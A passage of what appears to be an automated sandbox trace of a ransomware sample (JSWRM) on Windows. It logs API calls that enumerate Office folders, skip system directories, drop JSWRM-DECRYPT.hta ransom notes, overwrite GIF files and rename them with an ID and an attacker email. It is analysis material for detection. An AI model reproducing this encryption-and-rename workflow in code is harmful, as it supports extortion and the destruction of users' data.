office\\root\\clipart\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0073.147] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.147] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0073.148] CloseHandle (hObject=0x458) returned 1 [0073.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0073.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0073.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0073.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0073.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0073.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0073.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0073.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0073.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0073.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\jswrm-decrypt.hta")) returned 0x20 [0073.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0073.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0073.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0073.148] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2242de3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0073.148] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0073.148] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2242de3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0073.148] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0073.149] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0073.149] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2242de3d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2242de3d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2242de3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0073.149] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0073.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0073.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0073.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0073.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0073.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0073.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0073.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0073.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.149] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PUB60COR", cAlternateFileName="")) returned 1 [0073.149] lstrcmpiW (lpString1="PUB60COR", lpString2=".") returned 1 [0073.149] lstrcmpiW (lpString1="PUB60COR", lpString2="..") returned 1 [0073.149] lstrcmpiW (lpString1="PUB60COR", lpString2="...") returned 1 [0073.149] lstrcmpiW (lpString1="PUB60COR", lpString2="windows") returned -1 [0073.149] lstrcmpiW (lpString1="PUB60COR", lpString2="recovery") returned -1 [0073.149] lstrcmpiW (lpString1="PUB60COR", lpString2="perflogs") returned 1 [0073.150] lstrcmpiW (lpString1="PUB60COR", lpString2="documents and settings") returned 1 [0073.150] lstrcmpiW (lpString1="PUB60COR", lpString2="$RECYCLE.BIN") returned 1 [0073.150] lstrcmpiW (lpString1="PUB60COR", lpString2="system volume information") returned -1 [0073.150] lstrcmpiW (lpString1="PUB60COR", lpString2="msocache") returned 1 [0073.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0073.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0073.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0073.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0073.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0073.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0073.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0073.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jswrm-decrypt.hta")) returned 0xffffffff [0073.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0073.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0073.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0073.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0073.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0073.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0073.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0073.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0073.157] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.157] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0073.158] CloseHandle (hObject=0x45c) returned 1 [0073.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0073.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0073.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0073.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0073.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0073.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0073.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0073.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0073.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0073.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jswrm-decrypt.hta")) returned 0x20 [0073.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0073.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0073.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0073.159] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x224542f0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0073.160] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0073.160] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x224542f0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="..", cAlternateFileName="")) returned 1 [0073.160] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0073.160] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0073.160] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2340, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00004_.GIF", cAlternateFileName="")) returned 1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2=".") returned 1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="..") returned 1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="...") returned 1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="windows") returned -1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="recovery") returned -1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="perflogs") returned -1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="documents and settings") returned -1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="system volume information") returned -1 [0073.161] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="msocache") returned -1 [0073.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00004_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00004_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00004_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0073.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00004_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00004_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00004_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0073.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0073.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.163] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9024) returned 1 [0073.163] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2340) returned 0x24c1d0 [0073.163] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2340, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2340, lpOverlapped=0x0) returned 1 [0073.165] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.165] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2340, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2340, lpOverlapped=0x0) returned 1 [0073.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.165] CloseHandle (hObject=0x460) returned 1 [0073.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0073.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0073.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0073.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0073.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0073.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.165] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0073.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.166] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c30, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00011_.GIF", cAlternateFileName="")) returned 1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2=".") returned 1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="..") returned 1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="...") returned 1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="windows") returned -1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="recovery") returned -1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="perflogs") returned -1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="documents and settings") returned -1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="system volume information") returned -1 [0073.166] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="msocache") returned -1 [0073.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0073.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00011_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00011_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00011_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0073.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0073.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00011_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00011_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00011_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0073.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 